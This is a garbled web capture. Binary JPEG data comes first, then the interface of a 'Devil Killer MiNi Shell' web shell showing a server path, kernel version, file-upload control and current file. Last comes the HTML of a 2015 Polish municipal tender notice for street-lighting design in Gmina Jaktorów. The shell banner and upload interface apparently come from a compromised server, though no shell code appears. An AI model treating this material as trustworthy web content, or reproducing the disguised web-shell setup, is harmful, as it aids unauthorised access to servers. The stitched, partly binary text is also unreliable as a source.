JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150625/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150625/156052-N-2015.html

<p class="kh_header"><b>Jaktorów: Realizacja strategii niskoemisyjnej Gminy Jaktorów - budowa nowych energooszczędnych linii oświetlenia dróg gminnych w Gminie Jaktorów.</b><br>
<b>Numer ogłoszenia: 156052 - 2015; data zamieszczenia: 25.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Jaktorów , ul. Warszawska 33, 96-313 Jaktorów, woj. mazowieckie, tel. 046 8564026, 8564069, faks (046) 855 21 88.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.jaktorow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja strategii niskoemisyjnej Gminy Jaktorów - budowa nowych energooszczędnych linii oświetlenia dróg gminnych w Gminie Jaktorów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie dokumentacji projektowo - kosztorysowej na budowę oświetlenia dróg gminnych i powiatowych - zgodnie z załączonym wykazem ulic przewidzianych do wykonania oświetlenia ulicznego stanowiącym załącznik nr 1 do Opisu przedmiotu zamówienia. 
Przedmiot zamówienia obejmuje 4 części. Zamawiający dopuszcza składanie ofert częściowych, na jedną lub więcej części.
UWAGA !

W przypadku składania ofert na więcej niż na jedną część - na każdą Część zamówienia należy złożyć ofertę oddzielnie.
Część I zamówienia: 
Opracowanie dokumentacji projektowo - kosztorysowej na budowę oświetlenia ulicznego w ul. Alpejskiej od ul Włoskiej obręb Chylice, Budy - Grzybek, ul. Wyczółkowskiego obręb Budy Grzybek, Blich; ul. Wołodyjowskiego, ul. Skrzetuskiego, ul. Kmicica, ul. Zagłoby, ul. Powstańców (Fabryczna), ul. Ketlinga obręb Jaktorów, ul. Matejki  obręb Budy - Grzybek, ul. Rowickiego obręb Budy Grzybek, ul. Kiepury obręb Budy Grzybek, ul. Potockiego obręb Budy Grzybek.
Część II zamówienia: 
Opracowanie dokumentacji projektowo - kosztorysowej na budowę oświetlenia ulicznego w ul. Wysockiego, Kościuszki obręb Kolonia Jaktorów, ul. Parkowa obręb Chylice Kolonia, ul. Ułanów obręb Jaktorów, ul. Błotna i Łąkowa obręb Jaktorów, ul. Chopina obręb Budy Grzybek, ul. Sygietyńskiego obręb Budy Michałowskie, ul. Radziejowicka obręb Budy Stare/Michałowskie, ul. Paderewskiego obręb Budy Grzybek.
Część III zamówienia: 
Opracowanie dokumentacji projektowo - kosztorysowej na budowę oświetlenia ulicznego w ul. Kaska obręb Stare Budy, ul. Armii Krajowej obręb  Budy Zosine, ul. Topolowa obręb Henryszew.
Część IV zamówienia: 
Opracowanie dokumentacji projektowo - kosztorysowej na budowę oświetlenia ulicznego w ul. Królowej Marysieńki obręb Sade Budy, ul. Heweliusza + CMK obręb Bieganów, ul. Topolowa obręb Bieganów oraz w m. Mariampol.

Zakres prac projektowych obejmuje: 
1)	Opracowanie koncepcji projektowej oświetlenia zawierającej informację o podstawowych parametrach technicznych rozwiązań funkcjonalnych i materiałach proponowanych do zastosowania oraz szacunkowych kosztach w terminie 30 dni od dnia podpisania umowy.
2)	Zamawiający w terminie 7 dni od dnia przekazania koncepcji przez  Wykonawcę dokona oceny koncepcji i na piśmie przedłoży uwagi.
3)	Opracowanie ostatecznej wersji koncepcji w terminie 10 dni i uzyskanie pisemnej akceptacji Zamawiającego.
4)	Ilość koncepcji - 2 egz. w wersji papierowej .
5)	Przygotowanie i dostarczenie niezbędnych materiałów do uzyskania decyzji o ustaleniu lokalizacji inwestycji celu publicznego zgodnie z ustawą 27 marca 2003 r. o Planowaniu i zagospodarowaniu przestrzennym ( Dz. U. 2012 r. poz. 647 ze zm. ) lub uzyskanie wypisów z  miejscowego planu zagospodarowania.
6)	Uzyskanie map sytuacyjno-wysokościowych do celów projektowych w skali 1:500 w niezbędnym zakresie.
7)	Uzyskanie wypisów z ewidencji gruntów.
8)	Uzyskanie w imieniu Zamawiającego użyczenia gruntu na budowę oświetlenia od właścicieli nieruchomości wynikających z wypisu ewidencji gruntów.
9)	Uzyskanie decyzji pozwolenia wodno - prawnego ( w przypadku konieczności).
10)	Opracowanie materiałów do złożenia wniosku o uzyskanie decyzji zezwalającej na wycinkę drzew (w przypadku konieczności).
11)	Projekt wycinki drzew (w przypadku konieczności).
12)	 Projekty budowlane przebudowy infrastruktury technicznej kolidującej z projektowanymi liniami oświetlenia ulicznego  ( jeżeli zachodzi taka konieczność ).
13)	Dokumentacja, o której mowa musi zawierać następujące opracowania ( odrębnie dla każdej ulicy z danej części):
a)	projekty budowlane wykonane na mapie do celów projektowych w skali 1:500 z naniesionymi granicami pasa drogowego wraz ze szczegółowymi opiniami, uzgodnieniami z właściwymi organami oraz zatwierdzeniami niezbędnymi do kompleksowej realizacji zadania w 4 egzemplarzach,
b)	projekty wykonawcze wykonane na mapie do celów projektowych w skali 1:500 z naniesionymi granicami pasa drogowego wraz ze szczegółowymi opiniami, uzgodnieniami z właściwymi organami oraz zatwierdzeniami niezbędnymi do kompleksowej realizacji zadania w  3 egzemplarzach,
c)	kosztorys inwestorski  w 1 egzemplarzu,
d)	kosztorys ofertowy w 1 egzemplarzu,
e)	przedmiar robót  w 1 egzemplarzu,
f)	specyfikacja techniczna wykonania i odbioru robót  w 3 egzemplarzach,
g)	informację dotyczącą bezpieczeństwa i ochrony zdrowia należy wykonać zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 23.06.2003r. (Dz. U. Nr 120 poz. 1126) w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia w 7 egzemplarzach.
h)	nadzór autorski.
14)	Dokumentacja musi być sporządzona w formie papierowej - w ilościach określonych dla poszczególnych opracowań w ust. 13 oraz w formie elektronicznej w 1 egzemplarzu na nośniku elektronicznym CD -R, w tym dokumentację projektową, przedmiary robót, STWiOR, kosztorysy inwestorskie - w formacie PDF ( odrębnie dla każdej ulicy z danej części).
15)	Uzyskanie wszystkich wymaganych prawem decyzji, opinii, uzgodnień i sprawdzeń dla potrzeb realizacji Przedmiotu Umowy, w tym w szczególności niezbędnych do uzyskania Decyzji pozwolenia na budowę  ( odrębnie dla każdej ulicy z danej części) oraz inne niezbędne decyzje opinie i uzgodnienia, w ramach wynagrodzenia za wykonanie Przedmiotu Umowy. Wykonawca  zobowiązany jest do przygotowania wniosku o wydanie Decyzji pozwolenia na budowę( odrębnie dla każdej ulicy z danej części) . Złożenie wniosku i uzyskanie Decyzji pozwolenia na budowę jest po stronie Zamawiającego. 
16)	Wykonawca zobowiązany jest do opisywania proponowanych materiałów, wyrobów i urządzeń za pomocą parametrów technicznych, tzn. bez podawania ich nazw. Jeżeli nie będzie to możliwe na zasadach określonych w art. 29 ust. 3 ustawy Pzp i jedyną możliwością będzie podanie nazwy materiału , to projektant zobowiązany jest do podania co najmniej dwóch producentów tych materiałów a także określenie w dokumentacji projektowej cech jakościowych tych materiałów.
Oświetlenie uliczne 						
L.p.	Nazwa ulicy	Przewidywana długość	Przewidywana ilość lamp o mocy 70 - 100 W	Rodzaj słupów	Rodzaj linii	Numer warunków technicznych
Część I						
1	ul. Alpejska od ul Włoskiej, dz. ew. 155/32, 166/2, 226/2 obręb Chylice, Budy - Grzybek	ok. 0,6 km +  0,8 km = 1,4 km	ok. 38 szt.	Na istniejących słupach + słupy wirowane	Linia kablowa napowietrzna	02-RP-001770-2015 716/2015/P                                              15/R1/08507
2	ul. Wyczółkowskiego dz. ew. 506, 460, 464/2, 262/3 obręb Budy Grzybek	ok. 0,9 km	ok. 20 szt.	Słupy wirowane	Linia kablowa napowietrzna	02-RP-001741-2015 718/2015/P
3	Blich; ul. Wołodyjowskiego dz. ew. 265/37, ul. Skrzetuskiego dz. ew. 265/58, ul. Kmicica dz. ew. 265/20, ul. Zagłoby dz. ew. 265/11, ul. Powstańców (Fabryczna) dz. ew. 265/21, 265/15ul. Ketlinga dz. ew. 265/26 obręb Jaktorów	ok. 1,7 km	ok. 36 szt.	Słupy wirowane	Linia kablowa napowietrzna	02-RP-001754-2015 717/2015/P
4	ul. Matejki dz. ew. 450/2, 451/1, 450/20 obręb Budy - Grzybek	ok. 0,45 km	ok 10 szt.	Słupy wirowane	Linia kablowa doziemna	02-RP-001753-2015 729/2015/P
5	ul. Rowickiego obręb Budy Grzybek	ok. 0,7 km	ok. 16 szt.	Słupy wirowane	Linia kablowa doziemna	02-RP-001753-2015 729/2015/P
6	ul. Kiepury dz. ew. 140/1, 140/2, 122/3 obręb Budy Grzybek	ok. 0,45 km	ok 11 szt.	Słupy wirowane	Linia kablowa doziemna	02-RP-001761-2015 730/2015/P
7	ul. Potockiego obręb Budy Grzybek	ok. 1,03 km	ok. 23 szt.	Słupy wirowane	Linia kablowa napowietrzna	02-RP-001748-2015 728/2015/P
Część II						
1	ul. Wysockiego, Kościuszki obręb Kolonia Jaktorów	ul Wysockiego - ok. 0,72 km, ul. Kościuszki - 0,32 km	ul. Wysickiego - ok. 17 szt. Ul. Kościuszki - ok. 7 szt.	Słupy wirowane oraz na istniejących słupach	Linia kablowa napowietrzna	02-RP-001759-2015 711/2015/P
2	ul. Parkowa obręb Chylice Kolonia	ok. 0,4 km	ok. 10 szt.	Słupy wirowane	Linia kablowa napowietrzna	02-RP-001781-2015 734/2015/P
3	ul. Ułanów obręb Jaktorów	ok. 1,02 km	ok. 23 szt.	Słupy wirowane	Linia kablowa napowietrzna	02-RP-001739-2015 726/2015/P
4	ul. Błotna i Łąkowa obręb Jaktorów	ok. 0,6 km	ok. 14 szt.	Na istniejących słupach	Linia kablowa napowietrzna	02-RP-001739-2015 726/2015/P
5	ul. Chopina obręb Budy Grzybek	ok. 1,1 km	ok. 24 szt.	Słupy wirowane	Linia kablowa napowietrzna	02-RP-001749-2015 712/2015/P
6	ul. Sygietyńskiego obręb Budy Michałowskie	ok. 0,54 km	ok. 13 szt.	Słupy wirowane	Linia kablowa napowietrzna	02-RP-001750-2015 714/2015/P
7	ul. Radziejowicka obręb Budy Stare/Michałowskie	ok. 1,25 km	ok. 29 szt.	Słupy wirowane	Linia kablowa napowietrzna	02-RP-001769-2015 715/2015/P
8	ul. Paderewskiego obręb Budy Grzybek	ok. 0,25 km	ok. 6 szt.	Słupy wirowane	Linia kablowa napowietrzna	02-RP-001752-2015 713/2015/P
Część III						
1	ul. Kaska obręb Stare Budy	ok. 2,0 km	ok. 45 szt.	Słupy wirowane	Linia kablowa napowietrzna	02-RP-001778-2015 736/2015/P                            02-RP-001774-2015 733/2015/P
2	ul. Armii Krajowej obręb  Budy Zosine	ok. 2,8 km	 ok. 62 szt.	Słupy wirowane	Linia kablowa napowietrzna	02-RP-001782-2015 737/2015/P                                  02-RP-001785-2015 738/2015/P
3	ul. Topolowa obręb Henryszew	 ok. 2,2 km	 ok. 54 szt. 	Słupy stalowe ocynkowane	Linia kablowa doziemna	02-RP-001743-2015 727/2015/P
Część IV						
1	ul. Królowej Marysieńki obręb Sade Budy	ok. 1,95 km	ok. 48 szt.	Słupy wirowane	Linia kablowa napowietrzna	02-RP-001758-2015 722/2015/P                                02-RP-001764-2015 721/2015/P
2	ul. Heweliusza + CMK obręb Bieganów	ok. 2,2 km	ok. 55 szt.	Słupy wirowane	Linia kablowa napowietrzna	02-RP-001787-2015 739/2015/P                                 02-RP-001745-2015 719/2015/P              02-RP-001747-2015 720/2015?P
3	ul. Topolowa obręb Bieganów	ok. 0,7 km	ok. 17 szt.	Słupy wirowane	Linia kablowa napowietrzna	02-RP-001767-2015 731/2015/P
4	Mariampol dz. ew. 95/2, 144	ok. 0,65 km	ok. 15 szt.	Słupy wirowane	Linia kablowa napowietrzna	02-RP-001771-2015 732/2015/P.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający  przewiduje  możliwość udzielenia zamówień  uzupełniających dla I,II ,III i IV Części zamówienia na podstawie odrębnej umowy lub umów zawartych z Wykonawcą w trybie zamówienia z wolnej ręki, na podstawie art. 67 ust. 1 pkt 6 ustawy. Zamówienie uzupełniające może zostać udzielone w terminie 3 lat od dnia udzielenia zamówienia podstawowego. Łączna wartość zamówień  uzupełniających  nie będzie przekraczać 50% wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.31.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie wymaga</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy  w zakresie :
1.1.Wiedzy i doświadczenie wykażą iż:
Dla I Części zamówienia
Wykonali w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 usługę polegającą na opracowaniu kompletnej dokumentacji projektowo-kosztorysowej do uzyskania Decyzji pozwolenia na budowę w zakresie przebudowy lub rozbudowy lub budowy sieci energetycznej niskiego napięcia wraz z linią oświetlenia ulicznego.
Zamawiający dokona oceny spełnienia warunku na podstawie dokumentów przedłożonych przez wykonawcę metodą: spełnia/ nie spełnia   
Dla II Części zamówienia
Wykonali w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 usługę polegającą na opracowaniu kompletnej dokumentacji projektowo-kosztorysowej do uzyskania Decyzji pozwolenia na budowę w zakresie przebudowy lub rozbudowy lub budowy sieci energetycznej niskiego napięcia wraz z linią oświetlenia ulicznego.
Zamawiający dokona oceny spełnienia warunku na podstawie dokumentów przedłożonych przez wykonawcę metodą: spełnia/ nie spełnia   
Dla III Części zamówienia
Wykonali w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 usługę polegającą na opracowaniu kompletnej dokumentacji projektowo-kosztorysowej do uzyskania Decyzji pozwolenia na budowę w zakresie przebudowy lub rozbudowy lub budowy sieci energetycznej niskiego napięcia wraz z linią oświetlenia ulicznego.
Zamawiający dokona oceny spełnienia warunku na podstawie dokumentów przedłożonych przez wykonawcę metodą: spełnia/ nie spełnia   
Dla IV Części zamówienia
Wykonali w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 usługę polegającą na opracowaniu kompletnej dokumentacji projektowo-kosztorysowej do uzyskania Decyzji pozwolenia na budowę w zakresie przebudowy lub rozbudowy lub budowy sieci energetycznej niskiego napięcia wraz z linią oświetlenia ulicznego.
Zamawiający dokona oceny spełnienia warunku na podstawie dokumentów przedłożonych przez wykonawcę metodą: spełnia/ nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy  w zakresie :
1.2.Osoby zdolne do wykonania zamówienia wykażą iż 
Opis sposobu dokonywania oceny spełniania tego warunku
Dla I, II, III i IV Części zamówienia
Dysponują dla każdej części zamówienia oddzielnie  jednym projektantem (nie można wskazać jednego projektanta na więcej niż jedną część zamówienia) w specjalności elektrycznej  -posiadającym uprawnienia budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów prawa, uprawniające do projektowania w zakresie specjalności elektrycznej bez ograniczeń oraz minimum 3 letnie doświadczenie w samodzielnym projektowaniu w zakresie tej specjalności;
zamawiający dokona oceny spełnienia warunku na podstawie dokumentów przedłożonych przez wykonawcę metodą: spełnia/ nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin udzielonej rękojmi na wykonaną usługę określony w miesiącach - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany terminu, o którym mowa w § 2 ust. 1 umowy, jeżeli konieczny będzie  dodatkowy czas na uzyskanie wymaganych przepisami szczegółowych opinii, uzgodnień, decyzji i zatwierdzeń, niezbędnych do uzyskania Decyzji pozwolenia na budowę  prawidłowej do realizacji przedmiotu zamówienia, na co Wykonawca nie będzie miał wpływu.
Potwierdzeniem wystąpienia okoliczności, o których mowa w § 2 ust. 3 umowy, będzie sporządzony i podpisany  przez Wykonawcę i Zamawiającego protokół .
Protokół o którym mowa w § 2 ust. 4 będzie stanowił podstawę do sporządzenia aneksu w formie pisemnej podpisanego przez obie strony.1.	Zamawiający przewiduje możliwość zmiany postanowień umowy w stosunku do treści oferty w przypadkach, gdy:
1)	nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, 
2)	nastąpi zmiana przepisów prawa w zakresie podatku od towarów i usług w zakresie przedmiotu umowy prowadząca do podwyższenia całkowitego wynagrodzenia za realizację przedmiotu umowy
3)	Strony umowy uznają zasadność wprowadzenia zmian do umowy, a zmiany te nie wywołają niekorzystnych skutków dla Zamawiającego i nie spowodują zmiany oferowanych warunków realizacji zamówienia będących podstawą oceny ofert
4)	Zmiany osób przewidzianych do realizacji zamówienia jeżeli nowe osoby spełniają warunki z przetargu. 
2.	Zmiana postanowień umowy następuje w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jaktorow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Jaktorów , ul. Warszawska 33, 96-313 Jaktorów, pok. nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.07.2015 godzina 10:00, miejsce: Urząd Gminy Jaktorów , ul. Warszawska 33, 96-313 Jaktorów, pok. nr 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
